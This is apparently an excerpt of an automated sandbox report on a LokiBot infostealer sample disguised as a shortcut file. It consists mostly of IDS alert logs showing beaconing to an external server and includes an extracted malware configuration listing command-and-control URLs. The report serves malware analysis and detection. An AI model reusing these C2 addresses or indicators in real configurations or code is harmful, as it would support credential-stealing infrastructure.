2024-10-03T09:21:24.429751+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49741	45.149.241.169	80	TCP
2024-10-03T09:21:25.256730+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49742	45.149.241.169	80	TCP
2024-10-03T09:21:26.118736+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49743	45.149.241.169	80	TCP
2024-10-03T09:21:26.897709+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49744	45.149.241.169	80	TCP
2024-10-03T09:21:27.873598+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49745	45.149.241.169	80	TCP
2024-10-03T09:21:28.712017+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49746	45.149.241.169	80	TCP
2024-10-03T09:21:29.654591+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49747	45.149.241.169	80	TCP
2024-10-03T09:21:30.592777+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49749	45.149.241.169	80	TCP
2024-10-03T09:21:32.603612+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49750	45.149.241.169	80	TCP
2024-10-03T09:21:33.526238+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49751	45.149.241.169	80	TCP
2024-10-03T09:21:35.225314+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49752	45.149.241.169	80	TCP
2024-10-03T09:21:37.121380+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49753	45.149.241.169	80	TCP
2024-10-03T09:21:42.317761+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49754	45.149.241.169	80	TCP
2024-10-03T09:21:43.182438+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49755	45.149.241.169	80	TCP
2024-10-03T09:21:44.019040+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49756	45.149.241.169	80	TCP
2024-10-03T09:21:44.999700+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49757	45.149.241.169	80	TCP
2024-10-03T09:21:45.841003+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49758	45.149.241.169	80	TCP
2024-10-03T09:21:46.640569+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49759	45.149.241.169	80	TCP
2024-10-03T09:21:47.539146+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49760	45.149.241.169	80	TCP
2024-10-03T09:21:48.485570+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49761	45.149.241.169	80	TCP
2024-10-03T09:21:50.351787+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49762	45.149.241.169	80	TCP
2024-10-03T09:21:51.167462+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49763	45.149.241.169	80	TCP
2024-10-03T09:21:52.087418+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49764	45.149.241.169	80	TCP
2024-10-03T09:21:52.996562+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49765	45.149.241.169	80	TCP
2024-10-03T09:21:54.039701+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49766	45.149.241.169	80	TCP
2024-10-03T09:21:54.984252+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49767	45.149.241.169	80	TCP
2024-10-03T09:21:55.928869+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49768	45.149.241.169	80	TCP
2024-10-03T09:21:57.209847+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49769	45.149.241.169	80	TCP
2024-10-03T09:21:58.212197+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49770	45.149.241.169	80	TCP
2024-10-03T09:21:59.314369+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49771	45.149.241.169	80	TCP
2024-10-03T09:22:00.225165+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49772	45.149.241.169	80	TCP
2024-10-03T09:22:01.533864+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49773	45.149.241.169	80	TCP
2024-10-03T09:22:02.438719+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49774	45.149.241.169	80	TCP
2024-10-03T09:22:03.295902+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49775	45.149.241.169	80	TCP
2024-10-03T09:22:08.197130+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49776	45.149.241.169	80	TCP
2024-10-03T09:22:09.449762+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49777	45.149.241.169	80	TCP
2024-10-03T09:22:10.502964+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49778	45.149.241.169	80	TCP
2024-10-03T09:22:11.390993+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49779	45.149.241.169	80	TCP
2024-10-03T09:22:12.289773+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49780	45.149.241.169	80	TCP
2024-10-03T09:22:13.260240+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49781	45.149.241.169	80	TCP
2024-10-03T09:22:14.183320+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49782	45.149.241.169	80	TCP
2024-10-03T09:22:15.428230+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49783	45.149.241.169	80	TCP
2024-10-03T09:22:16.459230+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49784	45.149.241.169	80	TCP
2024-10-03T09:22:18.541296+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49785	45.149.241.169	80	TCP
2024-10-03T09:22:19.323391+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49786	45.149.241.169	80	TCP
2024-10-03T09:22:20.145363+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49787	45.149.241.169	80	TCP
2024-10-03T09:22:20.992218+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49788	45.149.241.169	80	TCP
2024-10-03T09:22:21.900606+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49789	45.149.241.169	80	TCP
2024-10-03T09:22:22.731444+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49790	45.149.241.169	80	TCP
2024-10-03T09:22:23.590474+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49791	45.149.241.169	80	TCP
2024-10-03T09:22:24.518060+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49792	45.149.241.169	80	TCP
2024-10-03T09:22:25.368288+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49793	45.149.241.169	80	TCP
2024-10-03T09:22:26.207258+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49794	45.149.241.169	80	TCP
2024-10-03T09:22:27.022466+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49795	45.149.241.169	80	TCP
2024-10-03T09:22:28.117331+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49796	45.149.241.169	80	TCP
2024-10-03T09:22:28.927858+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49797	45.149.241.169	80	TCP
2024-10-03T09:22:29.746973+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49798	45.149.241.169	80	TCP
2024-10-03T09:22:30.654397+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49799	45.149.241.169	80	TCP
2024-10-03T09:22:31.633256+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49800	45.149.241.169	80	TCP
2024-10-03T09:22:32.759509+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49801	45.149.241.169	80	TCP
2024-10-03T09:22:33.636826+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49802	45.149.241.169	80	TCP
2024-10-03T09:22:34.567446+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49803	45.149.241.169	80	TCP
2024-10-03T09:22:35.412082+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49804	45.149.241.169	80	TCP
2024-10-03T09:22:36.196016+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49805	45.149.241.169	80	TCP
2024-10-03T09:22:36.999089+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49806	45.149.241.169	80	TCP
2024-10-03T09:22:37.869567+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49807	45.149.241.169	80	TCP
2024-10-03T09:22:40.386731+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49808	45.149.241.169	80	TCP
2024-10-03T09:22:41.280593+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49809	45.149.241.169	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:20:46.743247+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49707	45.149.241.169	80	TCP
2024-10-03T09:20:47.692236+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49708	45.149.241.169	80	TCP
2024-10-03T09:20:48.567976+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49709	45.149.241.169	80	TCP
2024-10-03T09:20:56.608552+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49715	45.149.241.169	80	TCP
2024-10-03T09:20:58.316279+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49716	45.149.241.169	80	TCP
2024-10-03T09:20:59.297568+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49717	45.149.241.169	80	TCP
2024-10-03T09:21:00.494707+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49718	45.149.241.169	80	TCP
2024-10-03T09:21:01.777716+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49719	45.149.241.169	80	TCP
2024-10-03T09:21:03.684048+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49720	45.149.241.169	80	TCP
2024-10-03T09:21:04.600648+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49721	45.149.241.169	80	TCP
2024-10-03T09:21:05.528198+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49722	45.149.241.169	80	TCP
2024-10-03T09:21:06.423848+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49723	45.149.241.169	80	TCP
2024-10-03T09:21:07.339146+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49724	45.149.241.169	80	TCP
2024-10-03T09:21:08.254833+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49725	45.149.241.169	80	TCP
2024-10-03T09:21:09.163793+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49726	45.149.241.169	80	TCP
2024-10-03T09:21:10.038728+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49727	45.149.241.169	80	TCP
2024-10-03T09:21:11.038525+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49728	45.149.241.169	80	TCP
2024-10-03T09:21:12.097651+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49729	45.149.241.169	80	TCP
2024-10-03T09:21:13.053982+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49730	45.149.241.169	80	TCP
2024-10-03T09:21:13.963379+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49731	45.149.241.169	80	TCP
2024-10-03T09:21:14.812196+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49732	45.149.241.169	80	TCP
2024-10-03T09:21:15.631002+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49733	45.149.241.169	80	TCP
2024-10-03T09:21:17.618667+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49734	45.149.241.169	80	TCP
2024-10-03T09:21:18.848565+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49735	45.149.241.169	80	TCP
2024-10-03T09:21:20.073300+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49736	45.149.241.169	80	TCP
2024-10-03T09:21:20.894549+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49737	45.149.241.169	80	TCP
2024-10-03T09:21:21.709486+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49738	45.149.241.169	80	TCP
2024-10-03T09:21:22.731827+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49739	45.149.241.169	80	TCP
2024-10-03T09:21:23.541526+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49740	45.149.241.169	80	TCP
2024-10-03T09:21:24.429751+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49741	45.149.241.169	80	TCP
2024-10-03T09:21:25.256730+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49742	45.149.241.169	80	TCP
2024-10-03T09:21:26.118736+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49743	45.149.241.169	80	TCP
2024-10-03T09:21:26.897709+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49744	45.149.241.169	80	TCP
2024-10-03T09:21:27.873598+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49745	45.149.241.169	80	TCP
2024-10-03T09:21:28.712017+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49746	45.149.241.169	80	TCP
2024-10-03T09:21:29.654591+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49747	45.149.241.169	80	TCP
2024-10-03T09:21:30.592777+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49749	45.149.241.169	80	TCP
2024-10-03T09:21:32.603612+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49750	45.149.241.169	80	TCP
2024-10-03T09:21:33.526238+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49751	45.149.241.169	80	TCP
2024-10-03T09:21:35.225314+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49752	45.149.241.169	80	TCP
2024-10-03T09:21:37.121380+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49753	45.149.241.169	80	TCP
2024-10-03T09:21:42.317761+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49754	45.149.241.169	80	TCP
2024-10-03T09:21:43.182438+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49755	45.149.241.169	80	TCP
2024-10-03T09:21:44.019040+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49756	45.149.241.169	80	TCP
2024-10-03T09:21:44.999700+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49757	45.149.241.169	80	TCP
2024-10-03T09:21:45.841003+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49758	45.149.241.169	80	TCP
2024-10-03T09:21:46.640569+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49759	45.149.241.169	80	TCP
2024-10-03T09:21:47.539146+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49760	45.149.241.169	80	TCP
2024-10-03T09:21:48.485570+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49761	45.149.241.169	80	TCP
2024-10-03T09:21:50.351787+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49762	45.149.241.169	80	TCP
2024-10-03T09:21:51.167462+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49763	45.149.241.169	80	TCP
2024-10-03T09:21:52.087418+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49764	45.149.241.169	80	TCP
2024-10-03T09:21:52.996562+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49765	45.149.241.169	80	TCP
2024-10-03T09:21:54.039701+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49766	45.149.241.169	80	TCP
2024-10-03T09:21:54.984252+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49767	45.149.241.169	80	TCP
2024-10-03T09:21:55.928869+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49768	45.149.241.169	80	TCP
2024-10-03T09:21:57.209847+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49769	45.149.241.169	80	TCP
2024-10-03T09:21:58.212197+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49770	45.149.241.169	80	TCP
2024-10-03T09:21:59.314369+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49771	45.149.241.169	80	TCP
2024-10-03T09:22:00.225165+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49772	45.149.241.169	80	TCP
2024-10-03T09:22:01.533864+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49773	45.149.241.169	80	TCP
2024-10-03T09:22:02.438719+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49774	45.149.241.169	80	TCP
2024-10-03T09:22:03.295902+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49775	45.149.241.169	80	TCP
2024-10-03T09:22:08.197130+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49776	45.149.241.169	80	TCP
2024-10-03T09:22:09.449762+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49777	45.149.241.169	80	TCP
2024-10-03T09:22:10.502964+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49778	45.149.241.169	80	TCP
2024-10-03T09:22:11.390993+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49779	45.149.241.169	80	TCP
2024-10-03T09:22:12.289773+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49780	45.149.241.169	80	TCP
2024-10-03T09:22:13.260240+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49781	45.149.241.169	80	TCP
2024-10-03T09:22:14.183320+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49782	45.149.241.169	80	TCP
2024-10-03T09:22:15.428230+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49783	45.149.241.169	80	TCP
2024-10-03T09:22:16.459230+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49784	45.149.241.169	80	TCP
2024-10-03T09:22:18.541296+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49785	45.149.241.169	80	TCP
2024-10-03T09:22:19.323391+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49786	45.149.241.169	80	TCP
2024-10-03T09:22:20.145363+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49787	45.149.241.169	80	TCP
2024-10-03T09:22:20.992218+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49788	45.149.241.169	80	TCP
2024-10-03T09:22:21.900606+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49789	45.149.241.169	80	TCP
2024-10-03T09:22:22.731444+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49790	45.149.241.169	80	TCP
2024-10-03T09:22:23.590474+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49791	45.149.241.169	80	TCP
2024-10-03T09:22:24.518060+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49792	45.149.241.169	80	TCP
2024-10-03T09:22:25.368288+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49793	45.149.241.169	80	TCP
2024-10-03T09:22:26.207258+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49794	45.149.241.169	80	TCP
2024-10-03T09:22:27.022466+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49795	45.149.241.169	80	TCP
2024-10-03T09:22:28.117331+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49796	45.149.241.169	80	TCP
2024-10-03T09:22:28.927858+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49797	45.149.241.169	80	TCP
2024-10-03T09:22:29.746973+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49798	45.149.241.169	80	TCP
2024-10-03T09:22:30.654397+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49799	45.149.241.169	80	TCP
2024-10-03T09:22:31.633256+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49800	45.149.241.169	80	TCP
2024-10-03T09:22:32.759509+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49801	45.149.241.169	80	TCP
2024-10-03T09:22:33.636826+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49802	45.149.241.169	80	TCP
2024-10-03T09:22:34.567446+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49803	45.149.241.169	80	TCP
2024-10-03T09:22:35.412082+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49804	45.149.241.169	80	TCP
2024-10-03T09:22:36.196016+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49805	45.149.241.169	80	TCP
2024-10-03T09:22:36.999089+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49806	45.149.241.169	80	TCP
2024-10-03T09:22:37.869567+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49807	45.149.241.169	80	TCP
2024-10-03T09:22:40.386731+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49808	45.149.241.169	80	TCP
2024-10-03T09:22:41.280593+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.10	49809	45.149.241.169	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php"]}

Multi AV Scanner detection for submitted file

Source: Comprobante.lnk.lnk

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\screens.pif

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Comprobante.lnk.lnk

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49706 version: TLS 1.2

Source: C:\Users\user\Desktop\screens.pif

Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

5_2_00403D74

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49707 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49707 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49707 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49718 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49718 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49718 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49726 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49727 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49727 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49727 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49726 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49756 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49756 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49756 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49726 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49725 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49726 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49717 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49727 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49725 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49735 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49717 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49756 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49726 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49727 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49735 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49756 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49735 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49744 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49718 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49757 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49744 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49760 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49717 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49718 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49760 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49760 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49753 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49753 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49727
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49767 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49767 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49764 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49764 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49764 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49767 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49726
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49753 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49761 -> 45.149.241.169:80
